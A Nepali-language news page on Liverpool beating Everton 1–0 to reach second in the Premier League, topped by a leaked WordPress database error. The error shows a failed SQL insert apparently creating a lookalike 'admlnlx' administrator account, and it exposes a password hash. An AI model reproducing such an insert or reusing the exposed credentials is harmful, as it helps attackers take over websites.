WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BB9oGzdr5qn.m2QZ3TfG6cs.zFq9bv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 16:18:58', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ५–
लिभरपुल इंग्लिस प्रिमियर लिगको दोस्रो स्थानमा उक्लिएको छ।गयराती भएको खेलको अतिरिक्त समयमा साडियो मानेले गरेको निर्णायक गोलको मद्दतमा महत्वपूर्ण जित निकाल्दै लिभरपुल दोस्रो स्थानमा उक्लिएको हो ।
लिग अन्तर्गत सोमबार राति भएको खेमला लिभरपुलले एभर्टनलाई १–० ले हराएको हो। लिभरपुलको जितमा मानेले ८ मिनेटको इन्जुरी सयमको चौथो मिनेटमा गोल गरेका हुन्।
जितपछि दोस्रो स्थानमा उक्लिएको लिभरपुलको १७ खेलबाट ३७ अंक भएको छ। यस्तै शीर्ष स्थानमा रहेको चेल्सी ६ अंकले अग्रता लिइरहेको छ।
यस्तै ३६ अंक रहेको म्यानचेस्टर सिटी तेस्रो स्थानमा झरेको छ भने आर्सनल ३४ अंकसहित चौथो र टोटनह्याम ३३ अंकसहित पाँचौ स्थानमा छन्।